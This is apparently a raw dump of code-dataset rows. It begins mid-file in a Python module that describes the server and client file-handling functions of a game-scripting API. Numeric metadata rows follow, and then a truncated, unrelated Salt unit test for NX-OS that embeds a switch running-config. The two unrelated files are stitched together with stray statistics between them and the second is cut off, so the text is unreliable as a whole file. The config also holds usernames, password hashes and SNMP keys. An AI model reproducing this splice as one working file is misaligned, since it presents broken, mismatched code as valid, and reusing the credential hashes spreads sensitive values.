:If the file is in the current resource, only the file path is necessary, e.g. ''fileCreate("myfile.txt")''. """
},
result='if successful, returns a file handle which can be used with other file functions (filewrite, fileclose...). returns false if an error occured.' ,
),
url='fileCreate',
)
],
client=[
FunctionData(
signature=FunctionSignature(
name='fileCreate',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['file'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='filePath',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Creates a new file in a directory of a resource. If there already exists a file with the specified name, it is overwritten with an empty file.' ,
arguments={
"filePath": """The filepath of the file to be created in the following format: :resourceName/path. resourceName is the name of the resource the file is in, and path is the path from the root directory of the resource to the file.
:For example, if you want to create a file named 'myfile.txt' in the resource 'mapcreator', it can be created from another resource this way: ''fileCreate(":mapcreator/myfile.txt")''.
:If the file is in the current resource, only the file path is necessary, e.g. ''fileCreate("myfile.txt")''. """
},
result='if successful, returns a file handle which can be used with other file functions (filewrite, fileclose...). returns false if an error occured.' ,
),
url='fileCreate',
)
],
),
CompoundFunctionData(
server=[
FunctionData(
signature=FunctionSignature(
name='fileDelete',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['bool'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='filePath',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Deletes the specified file.' ,
arguments={
"filePath": """The filepath of the file to delete in the following format: :resourceName/path. resourceName is the name of the resource the file is in, and path is the path from the root directory of the resource to the file.
:For example, if you want to delete a file name "myFile.txt" in the resource 'fileres', it can be deleted from another resource this way: ''fileDelete(":fileres/myFile.txt")''.
:If the file is in the current resource, only the file path is necessary, e.g. ''fileDelete("myFile.txt")''. """
},
result='returns true if successful, false otherwise (for example if there exists no file with the given name, or it does exist but is in use).' ,
),
url='fileDelete',
)
],
client=[
FunctionData(
signature=FunctionSignature(
name='fileDelete',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['bool'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='filePath',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Deletes the specified file.' ,
arguments={
"filePath": """The filepath of the file to delete in the following format: :resourceName/path. resourceName is the name of the resource the file is in, and path is the path from the root directory of the resource to the file.
:For example, if you want to delete a file name "myFile.txt" in the resource 'fileres', it can be deleted from another resource this way: ''fileDelete(":fileres/myFile.txt")''.
:If the file is in the current resource, only the file path is necessary, e.g. ''fileDelete("myFile.txt")''. """
},
result='returns true if successful, false otherwise (for example if there exists no file with the given name, or it does exist but is in use).' ,
),
url='fileDelete',
)
],
),
CompoundFunctionData(
server=[
FunctionData(
signature=FunctionSignature(
name='fileExists',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['bool'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='filePath',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='This functions checks whether a specified file exists inside a resource.' ,
arguments={
"filePath": """The filepath of the file, whose existence is going to be checked, in the following format: :resourceName/path. resourceName is the name of the resource the file is checked to be in, and path is the path from the root directory of the resource to the file.
:For example, if you want to check whether a file named 'myfile.txt' exists in the resource 'mapcreator', it can be done from another resource this way: ''fileExists(":mapcreator/myfile.txt")''.
:If the file, whose existence is going to be checked, is in the current resource, only the file path is necessary, e.g. ''fileExists("myfile.txt")''. Note that you must use forward slashes '/' for the folders, backslashes '\' will return false. """
},
result='returns true if the file exists, false otherwise.' ,
),
url='fileExists',
)
],
client=[
FunctionData(
signature=FunctionSignature(
name='fileExists',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['bool'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='filePath',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='This functions checks whether a specified file exists inside a resource.' ,
arguments={
"filePath": """The filepath of the file, whose existence is going to be checked, in the following format: :resourceName/path. resourceName is the name of the resource the file is checked to be in, and path is the path from the root directory of the resource to the file.
:For example, if you want to check whether a file named 'myfile.txt' exists in the resource 'mapcreator', it can be done from another resource this way: ''fileExists(":mapcreator/myfile.txt")''.
:If the file, whose existence is going to be checked, is in the current resource, only the file path is necessary, e.g. ''fileExists("myfile.txt")''. Note that you must use forward slashes '/' for the folders, backslashes '\' will return false. """
},
result='returns true if the file exists, false otherwise.' ,
),
url='fileExists',
)
],
),
CompoundFunctionData(
server=[
FunctionData(
signature=FunctionSignature(
name='fileFlush',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['bool'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Forces pending disk writes to be executed. fileWrite doesnt directly write to the hard disk but places the data in a temporary buffer; only when there is enough data in the buffer it is actually written to disk. Call this function if you need the data written right now without closing the file. This is useful for log files that might want to be read while the resource is still executing. fileFlush can be called after each log entry is written. Without this, the file may appear empty or outdated to the user.' ,
arguments={
"theFile": """The file handle of the file you wish to flush. """
},
result='returns true if succeeded, false in case of failure (e.g. the file handle is invalid).' ,
),
url='fileFlush',
)
],
client=[
FunctionData(
signature=FunctionSignature(
name='fileFlush',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['bool'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Forces pending disk writes to be executed. fileWrite doesnt directly write to the hard disk but places the data in a temporary buffer; only when there is enough data in the buffer it is actually written to disk. Call this function if you need the data written right now without closing the file. This is useful for log files that might want to be read while the resource is still executing. fileFlush can be called after each log entry is written. Without this, the file may appear empty or outdated to the user.' ,
arguments={
"theFile": """The file handle of the file you wish to flush. """
},
result='returns true if succeeded, false in case of failure (e.g. the file handle is invalid).' ,
),
url='fileFlush',
)
],
),
CompoundFunctionData(
server=[
FunctionData(
signature=FunctionSignature(
name='fileGetPath',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['string'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='This function retrieves the path of the given file.' ,
arguments={
"theFile": """The file you want to get the path. """
},
result='returns a string representing the file path, false if invalid file was provided.' ,
),
url='fileGetPath',
)
],
client=[
FunctionData(
signature=FunctionSignature(
name='fileGetPath',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['string'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='This function retrieves the path of the given file.' ,
arguments={
"theFile": """The file you want to get the path. """
},
result='returns a string representing the file path, false if invalid file was provided.' ,
),
url='fileGetPath',
)
],
),
CompoundFunctionData(
server=[
FunctionData(
signature=FunctionSignature(
name='fileGetPos',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['int'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Returns the current read/write position in the given file.' ,
arguments={
"theFile": """the file handle you wish to get the position of. """
},
result='returns the file position if successful, or false if an error occured (e.g. an invalid handle was passed).' ,
),
url='fileGetPos',
)
],
client=[
FunctionData(
signature=FunctionSignature(
name='fileGetPos',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['int'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Returns the current read/write position in the given file.' ,
arguments={
"theFile": """the file handle you wish to get the position of. """
},
result='returns the file position if successful, or false if an error occured (e.g. an invalid handle was passed).' ,
),
url='fileGetPos',
)
],
),
CompoundFunctionData(
server=[
FunctionData(
signature=FunctionSignature(
name='fileGetSize',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['int'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Returns the total size in bytes of the given file.' ,
arguments={
"theFile": """the file handle you wish to get the size of. """
},
result='returns the file size if successful, or false if an error occured (e.g. an invalid file handle was passed).' ,
),
url='fileGetSize',
)
],
client=[
FunctionData(
signature=FunctionSignature(
name='fileGetSize',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['int'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Returns the total size in bytes of the given file.' ,
arguments={
"theFile": """the file handle you wish to get the size of. """
},
result='returns the file size if successful, or false if an error occured (e.g. an invalid file handle was passed).' ,
),
url='fileGetSize',
)
],
),
CompoundFunctionData(
server=[
FunctionData(
signature=FunctionSignature(
name='fileIsEOF',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['bool'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Checks if the file position is at the end of the file.' ,
arguments={
"theFile": """A handle to the file you wish to check. """
},
result='returns true if the file position of the specified file is at the end of the file, false otherwise.' ,
),
url='fileIsEOF',
)
],
client=[
FunctionData(
signature=FunctionSignature(
name='fileIsEOF',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['bool'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Checks if the file position is at the end of the file.' ,
arguments={
"theFile": """A handle to the file you wish to check. """
},
result='returns true if the file position of the specified file is at the end of the file, false otherwise.' ,
),
url='fileIsEOF',
)
],
),
CompoundFunctionData(
server=[
FunctionData(
signature=FunctionSignature(
name='fileOpen',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['file'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='filePath',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='readOnly',
argument_type=FunctionType(
names=['bool'],
is_optional=True,
),
default_value='false',
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Opens an existing file for reading and writing.' ,
arguments={
"filePath": """The filepath of the file in the following format: :resourceName/path. resourceName is the name of the resource the file is in, and path is the path from the root directory of the resource to the file.
:For example, if there is a file named 'coolObjects.txt' in the resource 'objectSearch', it can be opened from another resource this way: ''fileOpen(":objectSearch/coolObjects.txt")''.
:If the file is in the current resource, only the file path is necessary, e.g. ''fileOpen("coolObjects.txt")''. """,
"readOnly": """By default, the file is opened with reading and writing access. You can specify true for this parameter if you only need reading access. """
},
result='if successful, returns a file handle for the file. otherwise returns false (f.e. if the file doesnt exist).' ,
),
url='fileOpen',
)
],
client=[
FunctionData(
signature=FunctionSignature(
name='fileOpen',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['file'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='filePath',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='readOnly',
argument_type=FunctionType(
names=['bool'],
is_optional=True,
),
default_value='false',
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Opens an existing file for reading and writing.' ,
arguments={
"filePath": """The filepath of the file in the following format: :resourceName/path. resourceName is the name of the resource the file is in, and path is the path from the root directory of the resource to the file.
:For example, if there is a file named 'coolObjects.txt' in the resource 'objectSearch', it can be opened from another resource this way: ''fileOpen(":objectSearch/coolObjects.txt")''.
:If the file is in the current resource, only the file path is necessary, e.g. ''fileOpen("coolObjects.txt")''. """,
"readOnly": """By default, the file is opened with reading and writing access. You can specify true for this parameter if you only need reading access. """
},
result='if successful, returns a file handle for the file. otherwise returns false (f.e. if the file doesnt exist).' ,
),
url='fileOpen',
)
],
),
CompoundFunctionData(
server=[
FunctionData(
signature=FunctionSignature(
name='fileRead',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['string'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='count',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Reads the specified number of bytes from the given file starting at its current read/write position, and returns them as a string.' ,
arguments={
"theFile": """A handle to the file you wish to read from. Use fileOpen to obtain this handle. """,
"count": """The number of bytes you wish to read. """
},
result='returns the bytes that were read in a string. note that this string might not contain as many bytes as you specified if an error occured, i.e. end of file.' ,
),
url='fileRead',
)
],
client=[
FunctionData(
signature=FunctionSignature(
name='fileRead',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['string'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='count',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Reads the specified number of bytes from the given file starting at its current read/write position, and returns them as a string.' ,
arguments={
"theFile": """A handle to the file you wish to read from. Use fileOpen to obtain this handle. """,
"count": """The number of bytes you wish to read. """
},
result='returns the bytes that were read in a string. note that this string might not contain as many bytes as you specified if an error occured, i.e. end of file.' ,
),
url='fileRead',
)
],
),
CompoundFunctionData(
server=[
FunctionData(
signature=FunctionSignature(
name='fileRename',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['bool'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='filePath',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='newFilePath',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Renames the specified file.' ,
arguments={
"filePath": """The filepath of the source file in the following format: :resourceName/path. resourceName is the name of the resource the file is in, and path is the path from the root directory of the resource to the file. If the file is in the current resource, only the file path is necessary. """,
"newFilePath": """Destination filepath for the specified source file in the same format. """
},
result='if successful, returns true. otherwise returns false.' ,
),
url='fileRename',
)
],
client=[
FunctionData(
signature=FunctionSignature(
name='fileRename',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['bool'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='filePath',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='newFilePath',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Renames the specified file.' ,
arguments={
"filePath": """The filepath of the source file in the following format: :resourceName/path. resourceName is the name of the resource the file is in, and path is the path from the root directory of the resource to the file. If the file is in the current resource, only the file path is necessary. """,
"newFilePath": """Destination filepath for the specified source file in the same format. """
},
result='if successful, returns true. otherwise returns false.' ,
),
url='fileRename',
)
],
),
CompoundFunctionData(
server=[
FunctionData(
signature=FunctionSignature(
name='fileSetPos',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['int'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='offset',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Sets the current read/write position in the file.' ,
arguments={
"theFile": """The file handle of which you want to change the read/write position. """,
"offset": """The new position. This is the number of bytes from the beginning of the file. If this value is larger than the file size, it is limited to 52,428,800 bytes (50 MB). """
},
result='returns where the offset was actually set at. i.e. if offset was past the end of the file, it will be set at the end of the file, and this position will be returned. returns false in case of failure (e.g. the specified file handle is invalid).' ,
),
url='fileSetPos',
)
],
client=[
FunctionData(
signature=FunctionSignature(
name='fileSetPos',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['int'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='offset',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Sets the current read/write position in the file.' ,
arguments={
"theFile": """The file handle of which you want to change the read/write position. """,
"offset": """The new position. This is the number of bytes from the beginning of the file. If this value is larger than the file size, it is limited to 52,428,800 bytes (50 MB). """
},
result='returns where the offset was actually set at. i.e. if offset was past the end of the file, it will be set at the end of the file, and this position will be returned. returns false in case of failure (e.g. the specified file handle is invalid).' ,
),
url='fileSetPos',
)
],
),
CompoundFunctionData(
server=[
FunctionData(
signature=FunctionSignature(
name='fileWrite',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['int'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='string1',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='string2',
argument_type=FunctionType(
names=['string'],
is_optional=True,
),
default_value=None,
)
],
[
FunctionArgument(
name='string3',
argument_type=FunctionType(
names=['string'],
is_optional=True,
),
default_value=None,
)
]
],
variable_length=True,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Writes one or more strings to a given file, starting at the current read/write position. Advances the position over the number of bytes that were written.' ,
arguments={
"theFile": """A handle to the file you wish to write to. The file must have been opened with write access, i.e. the file handle must be a result of fileCreate or fileOpen with the readonly parameter set to false. """,
"string1": """The string to write. """
},
result='returns the number of bytes successfully written to the file, returns false if invalid arguments were specified.' ,
),
url='fileWrite',
)
],
client=[
FunctionData(
signature=FunctionSignature(
name='fileWrite',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['int'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='string1',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='string2',
argument_type=FunctionType(
names=['string'],
is_optional=True,
),
default_value=None,
)
],
[
FunctionArgument(
name='string3',
argument_type=FunctionType(
names=['string'],
is_optional=True,
),
default_value=None,
)
]
],
variable_length=True,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Writes one or more strings to a given file, starting at the current read/write position. Advances the position over the number of bytes that were written.' ,
arguments={
"theFile": """A handle to the file you wish to write to. The file must have been opened with write access, i.e. the file handle must be a result of fileCreate or fileOpen with the readonly parameter set to false. """,
"string1": """The string to write. """
},
result='returns the number of bytes successfully written to the file, returns false if invalid arguments were specified.' ,
),
url='fileWrite',
)
],
)
]
| 42.759418
| 544
| 0.381652
| 4,260
| 64,695
| 5.719484
| 0.064789
| 0.033901
| 0.043095
| 0.057131
| 0.99134
| 0.987646
| 0.97164
| 0.97164
| 0.97164
| 0.97164
| 0
| 0.000967
| 0.552516
| 64,695
| 1,512
| 545
| 42.787698
| 0.840656
| 0.000788
| 0
| 0.846622
| 1
| 0.040541
| 0.237585
| 0.008818
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.002703
| 0.000676
| 0
| 0.000676
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
2dd59d9a50842904e792b27003a58e05d6f0615f
| 33,976
|
py
|
Python
|
tests/unit/modules/nxos/nxos_config.py
|
Noah-Huppert/salt
|
998c382f5f2c3b4cbf7d96aa6913ada6993909b3
|
[
"Apache-2.0"
] | 19
|
2016-01-29T14:37:52.000Z
|
2022-03-30T18:08:01.000Z
|
tests/unit/modules/nxos/nxos_config.py
|
Noah-Huppert/salt
|
998c382f5f2c3b4cbf7d96aa6913ada6993909b3
|
[
"Apache-2.0"
] | 223
|
2016-03-02T16:39:41.000Z
|
2022-03-03T12:26:35.000Z
|
tests/unit/modules/nxos/nxos_config.py
|
Noah-Huppert/salt
|
998c382f5f2c3b4cbf7d96aa6913ada6993909b3
|
[
"Apache-2.0"
] | 64
|
2016-02-04T19:45:26.000Z
|
2021-12-15T02:02:31.000Z
|
# -*- coding: utf-8 -*-
template_engine_file_str = "no feature ospf"
config_result = [["no feature ospf"], [{}]]
initial_config = [
"\n!Command: show running-config\n!Running configuration last done at: Wed Dec 4 15:33:48 2019\n!Time: Wed Dec 4 15:33:55 2019\n\nversion 9.2(4) Bios:version 07.66 \nhostname n9k-device\ninstall feature-set fex\nvdc n9k-device id 1\n allow feature-set fex\n limit-resource vlan minimum 16 maximum 4094\n limit-resource vrf minimum 2 maximum 4096\n limit-resource port-channel minimum 0 maximum 256\n limit-resource u4route-mem minimum 248 maximum 248\n limit-resource u6route-mem minimum 96 maximum 96\n limit-resource m4route-mem minimum 58 maximum 58\n limit-resource m6route-mem minimum 8 maximum 8\nfeature-set fex\n\nfeature privilege\nfeature telnet\nfeature nxapi\nfeature bash-shell\ncfs eth distribute\nfeature ngmvpn\nfeature ospf\nfeature pim\nfeature lldp\n\nusername admin password 5 $5$mOJsBDrL$lhsuyA8VT/fkWM/5XaZcgHlJIYaaS/J5fh8qdDr6fU3 role network-admin\nusername devops_user password 5 ! role network-operator\nusername devops_user passphrase lifetime 99999 warntime 14 gracetime 3\nusername salt_test password 5 $5$mkXh6O4T$YUVtA89HbXCnue63kgghPlaqPHyaXhdtxPBbPEHhbRC role network-operator\nusername salt_test passphrase lifetime 99999 warntime 14 gracetime 3\nip domain-lookup\nip name-server 1.1.1.1 2.2.2.2\nno system default switchport\nsystem default switchport shutdown\nno logging event link-status default\nno logging event link-status enable\nno logging event trunk-status enable\ntime-range ans-range\ntime-range my_range\ncopp profile strict\nsnmp-server user admin network-admin auth md5 0xbb62c3df89880933539503f7675e8aa8 priv 0xbb62c3df89880933539503f7675e8aa8 localizedkey\nsnmp-server user devops_user network-operator \nsnmp-server user salt_test network-operator auth md5 0x3a16a4d0a569be282cc5fbc96138fac8 priv 0x3a16a4d0a569be282cc5fbc96138fac8 localizedkey\nrmon event 1 description FATAL(1) owner PMON@FATAL\nrmon event 2 description CRITICAL(2) owner PMON@CRITICAL\nrmon event 3 description ERROR(3) owner PMON@ERROR\nrmon event 4 description WARNING(4) owner PMON@WARNING\nrmon event 5 description INFORMATION(5) owner PMON@INFO\nno snmp-server enable traps entity entity_mib_change\nno snmp-server enable traps entity entity_module_status_change\nno snmp-server enable traps entity entity_power_status_change\nno snmp-server enable traps entity entity_module_inserted\nno snmp-server enable traps entity entity_module_removed\nno snmp-server enable traps entity entity_unrecognised_module\nno snmp-server enable traps entity entity_fan_status_change\nno snmp-server enable traps entity entity_power_out_change\nno snmp-server enable traps link linkDown\nno snmp-server enable traps link linkUp\nno snmp-server enable traps link extended-linkDown\nno snmp-server enable traps link extended-linkUp\nno snmp-server enable traps link cieLinkDown\nno snmp-server enable traps link cieLinkUp\nno snmp-server enable traps link delayed-link-state-change\nno snmp-server enable traps rf redundancy_framework\nno snmp-server enable traps license notify-license-expiry\nno snmp-server enable traps license notify-no-license-for-feature\nno snmp-server enable traps license notify-licensefile-missing\nno snmp-server enable traps license notify-license-expiry-warning\nno snmp-server enable traps upgrade UpgradeOpNotifyOnCompletion\nno snmp-server enable traps upgrade UpgradeJobStatusNotify\nno snmp-server enable traps rmon risingAlarm\nno snmp-server enable traps rmon fallingAlarm\nno snmp-server enable traps rmon hcRisingAlarm\nno snmp-server enable traps rmon hcFallingAlarm\nno snmp-server enable traps entity entity_sensor\nno snmp-server enable traps entity cefcMIBEnableStatusNotification\nno snmp-server enable traps generic coldStart\nno snmp-server enable traps generic warmStart\nno snmp-server enable traps storm-control cpscEventRev1\nno snmp-server enable traps link cErrDisableInterfaceEventRev1\nno snmp-server enable traps link cmn-mac-move-notification\nntp server 10.81.254.202 use-vrf management\n\nip pim ssm range none\nvlan 1\n\nvrf context management\n ip route 0.0.0.0/0 192.168.0.1\nvrf context myvrf\nvrf context testing\nnxapi http port 80\nno nxapi https\nnxapi ssl ciphers weak\nnxapi ssl protocols TLSv1 \n\n\ninterface port-channel19\n\ninterface port-channel42\n\ninterface port-channel55\n\ninterface port-channel66\n\ninterface Ethernet1/1\n\ninterface Ethernet1/2\n\ninterface Ethernet1/3\n no shutdown\n\ninterface Ethernet1/4\n\ninterface Ethernet1/5\n\ninterface Ethernet1/6\n\ninterface Ethernet1/7\n\ninterface Ethernet1/8\n\ninterface Ethernet1/9\n\ninterface Ethernet1/10\n\ninterface Ethernet1/11\n\ninterface Ethernet1/12\n\ninterface Ethernet1/13\n\ninterface Ethernet1/14\n\ninterface Ethernet1/15\n\ninterface Ethernet1/16\n\ninterface Ethernet1/17\n\ninterface Ethernet1/18\n\ninterface Ethernet1/19\n\ninterface Ethernet1/20\n\ninterface Ethernet1/21\n\ninterface Ethernet1/22\n\ninterface Ethernet1/23\n\ninterface Ethernet1/24\n\ninterface Ethernet1/25\n\ninterface Ethernet1/26\n\ninterface Ethernet1/27\n\ninterface Ethernet1/28\n\ninterface Ethernet1/29\n\ninterface Ethernet1/30\n\ninterface Ethernet1/31\n\ninterface Ethernet1/32\n\ninterface Ethernet1/33\n\ninterface Ethernet1/34\n\ninterface Ethernet1/35\n\ninterface Ethernet1/36\n\ninterface Ethernet1/37\n\ninterface Ethernet1/38\n\ninterface Ethernet1/39\n\ninterface Ethernet1/40\n\ninterface Ethernet1/41\n\ninterface Ethernet1/42\n\ninterface Ethernet1/43\n\ninterface Ethernet1/44\n\ninterface Ethernet1/45\n\ninterface Ethernet1/46\n\ninterface Ethernet1/47\n\ninterface Ethernet1/48\n\ninterface Ethernet2/1\n\ninterface Ethernet2/2\n\ninterface Ethernet2/3\n\ninterface Ethernet2/4\n\ninterface Ethernet2/5\n\ninterface Ethernet2/6\n\ninterface Ethernet2/7\n\ninterface Ethernet2/8\n\ninterface Ethernet2/9\n\ninterface Ethernet2/10\n\ninterface Ethernet2/11\n\ninterface Ethernet2/12\n\ninterface mgmt0\n vrf member management\n ip address 192.168.0.192/24\n\ninterface loopback0\n\ninterface loopback1\ncli alias name wr copy running startup-config\nline console\nline vty\nboot nxos bootflash:/nxos.9.2.4.bin \n\nno logging logfile\nno logging monitor\nno logging module\nno logging console\n\n\n"
]
modified_config = [
